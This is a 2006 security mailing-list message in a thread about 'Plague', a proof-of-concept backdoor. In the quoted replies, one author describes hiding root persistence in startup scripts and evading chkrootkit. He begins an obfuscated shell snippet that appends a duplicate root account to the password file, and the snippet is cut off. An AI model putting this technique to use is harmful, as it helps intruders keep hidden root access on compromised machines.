Date: Mon, 23 Oct 2006 10:17:19 -0500
From: Philosophil <flosofl@...il.com>
To: "hijacker@...um.net" <hijacker@...um.net>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Plague re-visited

You always get these "i'm l33t and like to insult people" kind of goons on
unmoderated lists.

They're good for a laugh, but usually I just ignore them or if they are
particularly odious I filter them to trash.  There's still good information
to be found every now and again on this list.

On 10/23/06, hijacker@...um.net <hijacker@...um.net> wrote:

> J. Oquendo,
> Sorry for my ever asking for clarification on plague.
>
> Keep the "good" work.
>

> Maybe I will be unsubscribed by the time you read those lines, who knows?
>
> cheers,
> -nik
>
> > hijacker@...um.net wrote:
> >> Hello Rik,
> >> and how on earth can you make "root" run that piece of code? Do you
> have
> >> to specify it in the README section that it is mandatory to run that as
> >> root in order the "new" application root will be installing to run as
> >> expected?
> >>

> > If you need someone to spell out how this works and how it maintains an
> > account then you should unsubscribe from all security lists and search
> > google for pokemon, change your hobby, get out of this field. From the
> > onset nothing specified "remote root access" it stated proof of concept
> > "BACKDOOR" if you need the term defined for you, re-read the previous
> > sentence in its entirety.
> >
> >> Indeed, it is hard to tell what it actually does... unless you open
> your
> >> eyes and see sed 's/root/something/g' somewhere.
> >>

> > The purpose of me pondering this was a "notion" that one doesn't always
> > need to re-invent the wheel. Using standard commands, its actually
> easier
> > and safer to maintain a backdoor. If someone already rooted a machine,
> how
> > does one maintain that account without setting off bells and whistles.
> > It's alot easier to whip up little bits and pieces and have it
> precompile
> > into one script, run itself, and delete itself afterwards. There would
> be
> > no trace of any "all inclusive" backdoor programs. A snippet here, a
> > snippet there all precompiling either on a system startup or shutdown.
> >
> >> Either way, installing from hundreds of source files, can make even the
> >> best sys admin to not notice that part of the source code of the
> >> BACKDOOR-contagious application!
> >>

> > Really... Most system administrators don't even pay attention to log
> > files. Most system administrators are so caught up with every work,
> > putting out fires, configuring and maintaining systems they don't have
> > time to check a 500gb drive for a backdoor, and when they do, they're
> > doing what running chkrootkit. Using a method such as the one I
> described
> > makes it much more difficult to detect a backdoor. As for seeing the
> word
> > root and raising a red flag, don't make me laugh, see lines 2 and 4
> > below... Let's start in /etc/rc3.d...
> >
> > echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}' /usr/include/paths.h`"
> > echo "echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >>
> $file"
> >  >>"  >>  K2nextfile
> > echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >>
> [...]

Content of type "text/html" skipped